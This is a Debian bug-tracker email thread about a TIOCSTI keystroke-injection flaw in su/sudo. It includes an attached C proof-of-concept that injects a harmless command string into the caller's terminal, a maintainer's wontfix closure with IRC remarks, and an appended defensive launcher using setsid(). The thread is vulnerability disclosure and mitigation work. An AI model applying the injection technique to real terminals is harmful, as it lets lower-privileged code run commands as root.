[Pkg-shadow-devel] Bug#262455: marked as done ([EXPERT] login: su, sudo, super: Local security hole -- arbitrary character injection)

Debian Bug Tracking System owner at bugs.debian.org
Sun Sep 11 10:33:34 UTC 2005


Your message dated Sun, 11 Sep 2005 12:31:06 +0200
with message-id <20050911103105.GI11006 at mykerinos.kheops.frmug.org>
and subject line Bug 262453: Marking one of these bugs as wontfix and closing one of both as duplicate
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--------------------------------------
Received: (at submit) by bugs.debian.org; 31 Jul 2004 02:22:14 +0000
From jjminar at fastmail.fm Fri Jul 30 19:22:14 2004
Return-path: <jjminar at fastmail.fm>
Received: from relay.inway.cz [212.24.128.3] 
	by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
	id 1BqjVl-0001V2-00; Fri, 30 Jul 2004 19:22:14 -0700
Received: from localhost (localhost [127.0.0.1])
	by relay.inway.cz (Postfix) with ESMTP id E69D3179DAA
	for <submit at bugs.debian.org>; Sat, 31 Jul 2004 04:22:12 +0200 (CEST)
Received: from mail.haltyr.dejvice.czf (snat2.arachne.czfree.net [212.24.150.227])
	by relay.inway.cz (Postfix) with ESMTP id 3863D179CDC
	for <submit at bugs.debian.org>; Sat, 31 Jul 2004 04:22:12 +0200 (CEST)
Received: by mail.haltyr.dejvice.czf (Postfix, from userid 1000)
	id B3BFE4892; Sat, 31 Jul 2004 04:18:11 +0200 (CEST)
Date: Sat, 31 Jul 2004 04:18:11 +0200
From: Jan Minar <jjminar at fastmail.fm>
To: Debian Bug Tracking System <submit at bugs.debian.org>
Subject: login: su, sudo: Local security hole -- arbitrary character injection
Message-ID: <20040731021811.GA28670 at kontryhel.haltyr.dyndns.org>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="oLBj+sq0vYjzfsbl"
Content-Disposition: inline
In-Reply-To: <200407261453.56729.russell at coker.com.au>
User-Agent: Mutt/1.3.28i
X-Reportbug-Version: 1.50
Delivered-To: submit at bugs.debian.org
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2004_03_25 
	(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-3.0 required=4.0 tests=BAYES_00 autolearn=no 
	version=2.60-bugs.debian.org_2004_03_25
X-Spam-Level: 


--oLBj+sq0vYjzfsbl
Content-Type: multipart/mixed; boundary="yrj/dFKFPuw6o+aM"
Content-Disposition: inline


--yrj/dFKFPuw6o+aM
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Package: login
Version: 20000902-12
Severity: critical
Justification: root security hole
Tags: security

Hi.

As Russell Coker pointed out in
[1]<200407261453.56729.russell at coker.com.au>, there is a flaw in su &
sudo which allows the attacker to stuff arbitrary characters into the
caller's keyboard buffer.

[1] http://lists.debian.org/debian-security/2004/07/msg00181.html

Because the file descriptor(s) pointing to the tty aren't closed, and
the su/sudo process is not a session leader:

>  [...] any other code running in the same UID could take over the
>  process via ptrace, fork off a child process that inherits the
>  administrator tty, and then stuff characters into the keyboard buffer
>  with ioctl(fd,TIOCSTI,&c) [...]

Note that there are some programs that are routinely run this way, such
as /etc/init.d/* .

Even worse, su/sudo can't be used as a sandboxing/privilege separation
tool, as malicious code could be *written* to exploit this loophole.
Also, once the remote attacker has taken control of the service,
s/he can inject keystrokes, too.  Simply put, the process being run
using su/sudo shouldn't have any access to your tty in the first place.

Also, allowing ptrace()ing of processes run with su/sudo opens the door
to various scams and program output manipulation which wouldn't be
possible if the caller ran the program under his/her own UID.

Please find the enclosed proof-of-concept.

Cheers,
Jan

-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux kontryhel 2.4.26-jan #6 SMP Tue Jul 27 21:24:30 CEST 2004 i686
Locale: LANG=C, LC_CTYPE=cs_CZ.ISO-8859-2

Versions of packages login depends on:
ii  libc6                         2.2.5-11.5 GNU C Library: Shared libraries an
ii  libpam-modules                0.72-35    Pluggable Authentication Modules f
ii  libpam0g                      0.72-35    Pluggable Authentication Modules l

-- 
   "To me, clowns aren't funny. In fact, they're kind of scary. I've wondered
 where this started and I think it goes back to the time I went to the circus,
			  and a clown killed my dad."

--yrj/dFKFPuw6o+aM
Content-Type: text/x-csrc; charset=us-ascii
Content-Disposition: attachment; filename="su-sploit-poc.c"
Content-Transfer-Encoding: quoted-printable

/*
 * sploit-poc.c -- su/sudo arbitrary character injection POC
 *
 * Usage:
 *   % gcc -o su-sploit-poc su-sploit-poc.c
 *   % su <user> -c ./su-sploit-poc&
 *   % sudo -u <user> ./su-sploit-poc&
 */

#include <stdio.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <sys/types.h>


int
main (void) {
  char *payload = "date\necho 'Hello, world!'";
  int c, i;
  pid_t pid;

  if ((pid = fork()) == 0) {
      return 0;
  } else if (pid == -1) {
      perror ("Can't fork");
      return 1;
  } else {
      sleep (1);
      /* Keep stuffing characters into the keyboard buffer... */
      for (i=0; (c = payload[i]) != '\0'; i++) {
	  if (ioctl (0, TIOCSTI, &c) == -1) {
	      perror ("ioctl() failed");
	      return 1;
	  }
      }
  }
  return 0;
}

--yrj/dFKFPuw6o+aM--

--oLBj+sq0vYjzfsbl
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFBCwFj+uczK20Fa5cRAqJfAJ0XtWn7GV/X3a0srrLuU6/wfyGxuACglimg
ijAMnwoxElEwLMvHGRiP5ps=
=SlEc
-----END PGP SIGNATURE-----

--oLBj+sq0vYjzfsbl--

---------------------------------------
Received: (at 262455-done) by bugs.debian.org; 11 Sep 2005 10:31:39 +0000
From bubulle at kheops.frmug.org Sun Sep 11 03:31:39 2005
Return-path: <bubulle at kheops.frmug.org>
Received: from perrier.eu.org (kheops.perrier.eu.org) [81.56.227.253] 
	by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
	id 1EEP7a-00023J-00; Sun, 11 Sep 2005 03:31:39 -0700
Received: from localhost (localhost [127.0.0.1])
	by kheops.perrier.eu.org (Postfix) with ESMTP id 496EF4F977;
	Sun, 11 Sep 2005 12:31:07 +0200 (CEST)
Received: from kheops.perrier.eu.org ([127.0.0.1])
	by localhost (kheops [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id 02450-06; Sun, 11 Sep 2005 12:31:06 +0200 (CEST)
Received: from mykerinos.kheops.frmug.org (mykerinos.kheops.frmug.org [192.168.1.3])
	by kheops.perrier.eu.org (Postfix) with ESMTP id 791C34F899;
	Sun, 11 Sep 2005 12:31:06 +0200 (CEST)
Received: by mykerinos.kheops.frmug.org (Postfix, from userid 7426)
	id 478CD2325E; Sun, 11 Sep 2005 12:31:06 +0200 (CEST)
Date: Sun, 11 Sep 2005 12:31:06 +0200
From: Christian Perrier <bubulle at debian.org>
To: Tomasz =?utf-8?Q?K=C5=82oczko?= <kloczek at zie.pg.gda.pl>
Cc: 262453-forwarded at bugs.debian.org, 262455-done at bugs.debian.org
Subject: Bug 262453: Marking one of these bugs as wontfix and closing one of both as duplicate
Message-ID: <20050911103105.GI11006 at mykerinos.kheops.frmug.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-15
Content-Disposition: inline
User-Agent: Mutt/1.5.10i
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at kheops.frmug.org
Content-Transfer-Encoding: quoted-printable
Delivered-To: 262455-done at bugs.debian.org
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
	(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-5.0 required=4.0 tests=BAYES_00,VALID_BTS_CONTROL 
	autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-CrossAssassin-Score: 2

severity 262453 normal
tags 262453 wontfix
thanks

Tomasz, at least could you have a look at http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=262453 ?

All the advice in these bug logs actually shows that su/sudo is probably
not the right place to fix the issue.

Having no clue about the right place to fix this, I hereby close one
of the bugs. The other one will probably sit forever in the passwd bug
log, unless Tomasz fixes it upstream.

As this may be unlikely, I tag the bug as "wontfix". At least, for
sure, we won't fix this alone in the Debian package.

Last comments from IRC:

11:52 < rleigh> bubulle: It's not something I'm all that familiar with, but it seems somewhat
                theoretical: if you are the same UID, you could ptrace() in any case.  I can't see
                it being possible to fix in su/sudo, because the most common use cases involve
                being part of an existing session (no setsid() allowed) and being either interactive
                or at least requiring stdin/stdout/stderr (so the file descriptors can't be
                closed).  It looks like it could be fixed in
11:52 < rleigh> start-stop-daemon, though.  For the others, I think it needs fixing in the init
                scripts so it's not vulnerable to start with.
11:57 < bubulle> well given that advice and mdz comments in the bug log I'm very tempted to
                 actually close these bugs as "rhetorical" nitpicking
12:01 < rleigh> bubulle: I'm not saying it's not exploitable, but I don't think su/sudo is the
                right place to fix it, unless (for example) you added an option to tell it it was
                running in "daemon mode", in which case it would be safe to setsid() and clean up
                the file descriptors.



-- 
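The "daemon mode" rleigh sketches in the IRC excerpt (a new session via setsid() plus cleaning up the inherited descriptors) is the mitigation this thread converges on: a program started without a controlling terminal and without tty descriptors has nothing to hand a child that could be used with TIOCSTI. The following launcher is an added example written for this page; it is not code from the bug report, from the shadow/login package or from sudo. The function names (`has_controlling_tty`, `detach_from_tty`, `run_detached`), the exit codes 125/126 and the 65536 descriptor cap are choices made here; it assumes a Linux or other POSIX system with `/dev/null` and `/dev/tty`.

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical "daemon mode" launcher (added example, not project code):
 * runs a command in a fresh session with no controlling terminal and with
 * stdin/stdout/stderr pointed at /dev/null, so nothing the command forks can
 * inherit a descriptor onto the caller's tty. */

/* Returns 1 if the calling process can still open its controlling terminal,
 * 0 otherwise (open("/dev/tty") fails with ENXIO when there is none). */
int has_controlling_tty(void)
{
    int fd = open("/dev/tty", O_RDWR | O_NOCTTY);
    if (fd < 0)
        return 0;
    close(fd);
    return 1;
}

/* Detach the caller from its session and terminal. Must run in a freshly
 * forked child, because setsid() fails in a process-group leader.
 * Returns 0 on success, -1 on failure. */
int detach_from_tty(void)
{
    if (setsid() == (pid_t)-1)          /* new session: no controlling tty */
        return -1;
    int nullfd = open("/dev/null", O_RDWR);
    if (nullfd < 0)
        return -1;
    for (int fd = 0; fd < 3; fd++) {    /* replace the inherited tty descriptors */
        if (dup2(nullfd, fd) < 0) {
            close(nullfd);
            return -1;
        }
    }
    if (nullfd > 2)
        close(nullfd);
    /* Close every other inherited descriptor; one of them may still be the
     * tty. A bounded loop is used instead of close_range(2) so this builds on
     * older systems; the 65536 cap is an arbitrary choice for this example. */
    long maxfd = sysconf(_SC_OPEN_MAX);
    if (maxfd < 0 || maxfd > 65536)
        maxfd = 65536;
    for (int fd = 3; fd < maxfd; fd++)
        close(fd);
    return 0;
}

/* Fork, detach the child, verify from inside the child that the detachment
 * took effect, then exec argv there. Returns the child's exit status, or -1
 * if fork/wait failed or the child died from a signal. The child exits 125
 * if detachment or verification failed and 126 if exec failed. */
int run_detached(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (detach_from_tty() != 0)
            _exit(125);
        /* Verification: own session, no tty behind fd 0..2, no /dev/tty. */
        if (getsid(0) != getpid() || isatty(STDIN_FILENO) ||
            isatty(STDOUT_FILENO) || isatty(STDERR_FILENO) ||
            has_controlling_tty())
            _exit(125);
        execvp(argv[0], argv);
        _exit(126);                     /* exec failed; stderr is /dev/null */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s command [args...]\n", argv[0]);
        return 2;
    }
    int rc = run_detached(&argv[1]);
    printf("child exit status: %d\n", rc);
    return rc < 0 ? 1 : rc;
}
```

This addresses only the tty side of the report: a command launched this way has no descriptor on which TIOCSTI could act, which is what makes it usable for init-script style jobs. It does not change the ptrace situation, which remains whatever the kernel's same-UID ptrace policy allows, and it is by construction unsuitable for the interactive su/sudo use cases rleigh describes, where the session and the standard descriptors have to stay attached.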